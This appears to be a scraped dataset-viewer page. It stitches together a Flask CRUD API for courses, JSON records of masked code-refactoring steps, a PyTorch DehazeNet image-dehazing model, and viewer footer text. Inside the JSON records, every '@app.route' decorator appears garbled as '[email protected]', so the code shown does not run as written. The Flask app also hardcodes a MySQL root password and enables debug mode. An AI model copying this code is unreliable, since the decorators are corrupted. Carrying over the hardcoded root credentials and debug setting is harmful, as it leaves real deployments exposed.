@app.route('/cursos/<id>', methods=['GET'])
def get_task(id):
cursoGet = curso.query.get(id)
return curso_Schema.jsonify(cursoGet)
@app.route('/cursos/<id>', methods=['PUT'])
def update_curso(id):
cursoUpdate=curso.query.get(id)
nombre = request.json['nombre_curso']
precio = request.json['precio']
cursoUpdate.nombre_curso = nombre
cursoUpdate.precio = precio
db.session.commit()
return curso_Schema.jsonify(cursoUpdate)
@app.route('/cursos/<id>',methods=['DELETE'])
def delete_item(id):
cursoDelete = curso.query.get(id)
db.session.delete(cursoDelete)
db.session.commit()
return curso_Schema.jsonify(cursoDelete)
if __name__ == "__main__":
app.run(debug=True)
|
flexible
|
{
"blob_id": "5c1d1eafb913822be9b6e46b15c6886f8bf3e2e1",
"index": 3622,
"step-1": "<mask token>\n\n\nclass curso(db.Model):\n idcurso = db.Column(db.Integer, primary_key=True)\n nombre_curso = db.Column(db.String(45))\n precio = db.Column(db.Integer)\n\n def __init__(self, nombre, precio):\n self.nombre_curso = nombre\n self.precio = precio\n\n\n<mask token>\n\n\nclass CursoSchema(ma.Schema):\n\n\n class Meta:\n fields = 'idcurso', 'nombre_curso', 'precio'\n\n\n<mask token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return jsonify({'message': 'Academia'})\n\n\[email protected]('/cursos', methods=['POST'])\ndef create_curso():\n nombre_curso = request.json['nombre_curso']\n precio = request.json['precio']\n new_Curso = curso(nombre_curso, precio)\n db.session.add(new_Curso)\n db.session.commit()\n return curso_Schema.jsonify(new_Curso)\n\n\[email protected]('/cursos', methods=['GET'])\ndef get_cursos():\n all_cursos = curso.query.all()\n result = cursos_Schema.dump(all_cursos)\n return jsonify(result)\n\n\[email protected]('/cursos/<id>', methods=['GET'])\ndef get_task(id):\n cursoGet = curso.query.get(id)\n return curso_Schema.jsonify(cursoGet)\n\n\n<mask token>\n\n\[email protected]('/cursos/<id>', methods=['DELETE'])\ndef delete_item(id):\n cursoDelete = curso.query.get(id)\n db.session.delete(cursoDelete)\n db.session.commit()\n return curso_Schema.jsonify(cursoDelete)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass curso(db.Model):\n idcurso = db.Column(db.Integer, primary_key=True)\n nombre_curso = db.Column(db.String(45))\n precio = db.Column(db.Integer)\n\n def __init__(self, nombre, precio):\n self.nombre_curso = nombre\n self.precio = precio\n\n\n<mask token>\n\n\nclass CursoSchema(ma.Schema):\n\n\n class Meta:\n fields = 'idcurso', 'nombre_curso', 'precio'\n\n\n<mask token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return jsonify({'message': 'Academia'})\n\n\[email protected]('/cursos', methods=['POST'])\ndef create_curso():\n nombre_curso = request.json['nombre_curso']\n precio = request.json['precio']\n new_Curso = curso(nombre_curso, precio)\n db.session.add(new_Curso)\n db.session.commit()\n return curso_Schema.jsonify(new_Curso)\n\n\[email protected]('/cursos', methods=['GET'])\ndef get_cursos():\n all_cursos = curso.query.all()\n result = cursos_Schema.dump(all_cursos)\n return jsonify(result)\n\n\[email protected]('/cursos/<id>', methods=['GET'])\ndef get_task(id):\n cursoGet = curso.query.get(id)\n return curso_Schema.jsonify(cursoGet)\n\n\[email protected]('/cursos/<id>', methods=['PUT'])\ndef update_curso(id):\n cursoUpdate = curso.query.get(id)\n nombre = request.json['nombre_curso']\n precio = request.json['precio']\n cursoUpdate.nombre_curso = nombre\n cursoUpdate.precio = precio\n db.session.commit()\n return curso_Schema.jsonify(cursoUpdate)\n\n\[email protected]('/cursos/<id>', methods=['DELETE'])\ndef delete_item(id):\n cursoDelete = curso.query.get(id)\n db.session.delete(cursoDelete)\n db.session.commit()\n return curso_Schema.jsonify(cursoDelete)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass curso(db.Model):\n idcurso = db.Column(db.Integer, primary_key=True)\n nombre_curso = db.Column(db.String(45))\n precio = db.Column(db.Integer)\n\n def __init__(self, nombre, precio):\n self.nombre_curso = nombre\n self.precio = precio\n\n\ndb.create_all()\n\n\nclass CursoSchema(ma.Schema):\n\n\n class Meta:\n fields = 'idcurso', 'nombre_curso', 'precio'\n\n\n<mask token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return jsonify({'message': 'Academia'})\n\n\[email protected]('/cursos', methods=['POST'])\ndef create_curso():\n nombre_curso = request.json['nombre_curso']\n precio = request.json['precio']\n new_Curso = curso(nombre_curso, precio)\n db.session.add(new_Curso)\n db.session.commit()\n return curso_Schema.jsonify(new_Curso)\n\n\[email protected]('/cursos', methods=['GET'])\ndef get_cursos():\n all_cursos = curso.query.all()\n result = cursos_Schema.dump(all_cursos)\n return jsonify(result)\n\n\[email protected]('/cursos/<id>', methods=['GET'])\ndef get_task(id):\n cursoGet = curso.query.get(id)\n return curso_Schema.jsonify(cursoGet)\n\n\[email protected]('/cursos/<id>', methods=['PUT'])\ndef update_curso(id):\n cursoUpdate = curso.query.get(id)\n nombre = request.json['nombre_curso']\n precio = request.json['precio']\n cursoUpdate.nombre_curso = nombre\n cursoUpdate.precio = precio\n db.session.commit()\n return curso_Schema.jsonify(cursoUpdate)\n\n\[email protected]('/cursos/<id>', methods=['DELETE'])\ndef delete_item(id):\n cursoDelete = curso.query.get(id)\n db.session.delete(cursoDelete)\n db.session.commit()\n return curso_Schema.jsonify(cursoDelete)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-4": "from flask import Flask, json, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport warnings\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'\n ] = 'mysql+pymysql://root:1234@localhost/escuela'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n\nclass curso(db.Model):\n idcurso = db.Column(db.Integer, primary_key=True)\n nombre_curso = db.Column(db.String(45))\n precio = db.Column(db.Integer)\n\n def __init__(self, nombre, precio):\n self.nombre_curso = nombre\n self.precio = precio\n\n\ndb.create_all()\n\n\nclass CursoSchema(ma.Schema):\n\n\n class Meta:\n fields = 'idcurso', 'nombre_curso', 'precio'\n\n\ncurso_Schema = CursoSchema()\ncursos_Schema = CursoSchema(many=True)\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return jsonify({'message': 'Academia'})\n\n\[email protected]('/cursos', methods=['POST'])\ndef create_curso():\n nombre_curso = request.json['nombre_curso']\n precio = request.json['precio']\n new_Curso = curso(nombre_curso, precio)\n db.session.add(new_Curso)\n db.session.commit()\n return curso_Schema.jsonify(new_Curso)\n\n\[email protected]('/cursos', methods=['GET'])\ndef get_cursos():\n all_cursos = curso.query.all()\n result = cursos_Schema.dump(all_cursos)\n return jsonify(result)\n\n\[email protected]('/cursos/<id>', methods=['GET'])\ndef get_task(id):\n cursoGet = curso.query.get(id)\n return curso_Schema.jsonify(cursoGet)\n\n\[email protected]('/cursos/<id>', methods=['PUT'])\ndef update_curso(id):\n cursoUpdate = curso.query.get(id)\n nombre = request.json['nombre_curso']\n precio = request.json['precio']\n cursoUpdate.nombre_curso = nombre\n cursoUpdate.precio = precio\n db.session.commit()\n return curso_Schema.jsonify(cursoUpdate)\n\n\[email protected]('/cursos/<id>', methods=['DELETE'])\ndef delete_item(id):\n cursoDelete = curso.query.get(id)\n db.session.delete(cursoDelete)\n db.session.commit()\n return curso_Schema.jsonify(cursoDelete)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-5": "from flask import Flask, json, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport warnings\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:1234@localhost/escuela'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False\n\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\nclass curso(db.Model):\n idcurso = db.Column(db.Integer, primary_key=True)\n nombre_curso = db.Column(db.String(45))\n precio = db.Column(db.Integer)\n\n def __init__(self, nombre, precio):\n self.nombre_curso = nombre\n self.precio = precio\n\ndb.create_all()\n\nclass CursoSchema(ma.Schema):\n class Meta:\n fields = ('idcurso','nombre_curso','precio')\n\ncurso_Schema = CursoSchema()\ncursos_Schema = CursoSchema(many=True)\n\[email protected]('/',methods=['GET'])\ndef index():\n return jsonify({'message': 'Academia'})\n\[email protected]('/cursos', methods=['POST'])\ndef create_curso():\n nombre_curso = request.json['nombre_curso']\n precio = request.json['precio']\n\n new_Curso = curso(nombre_curso,precio)\n db.session.add(new_Curso)\n db.session.commit()\n\n return curso_Schema.jsonify(new_Curso)\n\[email protected]('/cursos',methods=['GET'])\ndef get_cursos():\n all_cursos = curso.query.all()\n result =cursos_Schema.dump(all_cursos)\n return jsonify(result)\n\[email protected]('/cursos/<id>', methods=['GET'])\ndef get_task(id):\n cursoGet = curso.query.get(id)\n return curso_Schema.jsonify(cursoGet)\n\[email protected]('/cursos/<id>', methods=['PUT'])\ndef update_curso(id):\n cursoUpdate=curso.query.get(id)\n nombre = request.json['nombre_curso']\n precio = request.json['precio']\n\n cursoUpdate.nombre_curso = nombre\n cursoUpdate.precio = precio\n\n db.session.commit()\n return curso_Schema.jsonify(cursoUpdate)\n\[email protected]('/cursos/<id>',methods=['DELETE'])\ndef delete_item(id):\n cursoDelete = curso.query.get(id)\n db.session.delete(cursoDelete)\n db.session.commit()\n\n return curso_Schema.jsonify(cursoDelete)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)",
"step-ids": [
9,
10,
11,
13,
14
]
}
|
[
9,
10,
11,
13,
14
] |
import torch
import torch.nn as nn
class DehazeNet(nn.Module):
def __init__(self, input=16, groups=4):
super(DehazeNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5)
self.relu1 = nn.ReLU()
self.conv2 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=3, padding=1)
self.relu2 = nn.ReLU()
self.conv3 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=5, padding=2)
self.relu3 = nn.ReLU()
self.conv4 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=7, padding=3)
self.relu4 = nn.ReLU()
self.maxpool = nn.MaxPool2d(kernel_size=7, stride=1)
self.conv5 = nn.Conv2d(in_channels=48, out_channels=1, kernel_size=6)
def forward(self, x):
#feature extraction
out = self.conv1(x)
out = self.relu1(out)
#maxout
max_1 = torch.max(out[:,0:4,:,:],out[:,4:8,:,:])
max_2 = torch.max(out[:,8:12,:,:],out[:,12:16,:,:])
out = torch.max(max_1,max_2)
#multi-scale Mapping
out1 = self.conv2(out)
out1 = self.relu2(out1)
out2 = self.conv3(out)
out2 = self.relu3(out2)
out3 = self.conv4(out)
out3 = self.relu4(out3)
y = torch.cat((out1,out2,out3), dim=1)
#Local Extremum
y = self.maxpool(y)
#non-linear Regression
y = self.conv5(y)
y = torch.max(y, torch.zeros(y.shape[0],y.shape[1],y.shape[2],y.shape[3]).cuda())
y = torch.min(y, torch.ones(y.shape[0],y.shape[1],y.shape[2],y.shape[3]).cuda())
return y
|
normal
|
{
"blob_id": "a8cf8d0965cb877d50cee403fbc30f27484f4f36",
"index": 8201,
"step-1": "<mask token>\n\n\nclass DehazeNet(nn.Module):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass DehazeNet(nn.Module):\n\n def __init__(self, input=16, groups=4):\n super(DehazeNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 3, padding=1)\n self.relu2 = nn.ReLU()\n self.conv3 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 5, padding=2)\n self.relu3 = nn.ReLU()\n self.conv4 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 7, padding=3)\n self.relu4 = nn.ReLU()\n self.maxpool = nn.MaxPool2d(kernel_size=7, stride=1)\n self.conv5 = nn.Conv2d(in_channels=48, out_channels=1, kernel_size=6)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass DehazeNet(nn.Module):\n\n def __init__(self, input=16, groups=4):\n super(DehazeNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 3, padding=1)\n self.relu2 = nn.ReLU()\n self.conv3 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 5, padding=2)\n self.relu3 = nn.ReLU()\n self.conv4 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 7, padding=3)\n self.relu4 = nn.ReLU()\n self.maxpool = nn.MaxPool2d(kernel_size=7, stride=1)\n self.conv5 = nn.Conv2d(in_channels=48, out_channels=1, kernel_size=6)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.relu1(out)\n max_1 = torch.max(out[:, 0:4, :, :], out[:, 4:8, :, :])\n max_2 = torch.max(out[:, 8:12, :, :], out[:, 12:16, :, :])\n out = torch.max(max_1, max_2)\n out1 = self.conv2(out)\n out1 = self.relu2(out1)\n out2 = self.conv3(out)\n out2 = self.relu3(out2)\n out3 = self.conv4(out)\n out3 = self.relu4(out3)\n y = torch.cat((out1, out2, out3), dim=1)\n y = self.maxpool(y)\n y = self.conv5(y)\n y = torch.max(y, torch.zeros(y.shape[0], y.shape[1], y.shape[2], y.\n shape[3]).cuda())\n y = torch.min(y, torch.ones(y.shape[0], y.shape[1], y.shape[2], y.\n shape[3]).cuda())\n return y\n",
"step-4": "import torch\nimport torch.nn as nn\n\n\nclass DehazeNet(nn.Module):\n\n def __init__(self, input=16, groups=4):\n super(DehazeNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 3, padding=1)\n self.relu2 = nn.ReLU()\n self.conv3 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 5, padding=2)\n self.relu3 = nn.ReLU()\n self.conv4 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=\n 7, padding=3)\n self.relu4 = nn.ReLU()\n self.maxpool = nn.MaxPool2d(kernel_size=7, stride=1)\n self.conv5 = nn.Conv2d(in_channels=48, out_channels=1, kernel_size=6)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.relu1(out)\n max_1 = torch.max(out[:, 0:4, :, :], out[:, 4:8, :, :])\n max_2 = torch.max(out[:, 8:12, :, :], out[:, 12:16, :, :])\n out = torch.max(max_1, max_2)\n out1 = self.conv2(out)\n out1 = self.relu2(out1)\n out2 = self.conv3(out)\n out2 = self.relu3(out2)\n out3 = self.conv4(out)\n out3 = self.relu4(out3)\n y = torch.cat((out1, out2, out3), dim=1)\n y = self.maxpool(y)\n y = self.conv5(y)\n y = torch.max(y, torch.zeros(y.shape[0], y.shape[1], y.shape[2], y.\n shape[3]).cuda())\n y = torch.min(y, torch.ones(y.shape[0], y.shape[1], y.shape[2], y.\n shape[3]).cuda())\n return y\n",
"step-5": "import torch\nimport torch.nn as nn\n\nclass DehazeNet(nn.Module):\n def __init__(self, input=16, groups=4):\n super(DehazeNet, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5)\n self.relu1 = nn.ReLU()\n\n self.conv2 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=3, padding=1)\n self.relu2 = nn.ReLU()\n self.conv3 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=5, padding=2)\n self.relu3 = nn.ReLU()\n self.conv4 = nn.Conv2d(in_channels=4, out_channels=16, kernel_size=7, padding=3)\n self.relu4 = nn.ReLU()\n self.maxpool = nn.MaxPool2d(kernel_size=7, stride=1)\n self.conv5 = nn.Conv2d(in_channels=48, out_channels=1, kernel_size=6)\n \n \n def forward(self, x):\n #feature extraction\n out = self.conv1(x)\n out = self.relu1(out)\n #maxout\n max_1 = torch.max(out[:,0:4,:,:],out[:,4:8,:,:])\n max_2 = torch.max(out[:,8:12,:,:],out[:,12:16,:,:])\n out = torch.max(max_1,max_2)\n\n #multi-scale Mapping\n out1 = self.conv2(out)\n out1 = self.relu2(out1)\n out2 = self.conv3(out)\n out2 = self.relu3(out2)\n out3 = self.conv4(out)\n out3 = self.relu4(out3)\n y = torch.cat((out1,out2,out3), dim=1)\n #Local Extremum\n y = self.maxpool(y)\n #non-linear Regression\n y = self.conv5(y)\n y = torch.max(y, torch.zeros(y.shape[0],y.shape[1],y.shape[2],y.shape[3]).cuda())\n y = torch.min(y, torch.ones(y.shape[0],y.shape[1],y.shape[2],y.shape[3]).cuda())\n return y",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.